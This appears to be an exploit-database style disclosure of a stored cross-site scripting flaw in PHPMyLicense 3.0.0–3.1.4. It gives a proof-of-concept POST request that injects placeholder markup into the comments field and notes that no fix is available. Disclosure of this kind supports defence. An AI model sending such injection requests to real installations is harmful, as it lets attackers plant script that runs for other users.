Hello, I want to report following exploit:# Exploit Title: PHPMyLicense Stored Cross Site Scripting# Date: 09-10-2015# Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH# Website: https://websec-test.com# Vendor Homepage: https://phpmylicense.com# Software Link: http://codecanyon.net/item/phpmylicense/11719122# Version: 3.0.0 - 3.1.4 (REQUIRED)# Category: Webapps1.) Description:
Any registered user can simply disable functionality of the whole application andinput malicious code because of a lack of filtering.2.) Proof of Concept:
localhost/phpmylicense/ajax/
POST:
comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense¶meters=bla&productid=20&serialkey=bla&status=processing
3.) Solution:None.- No Update available for it.
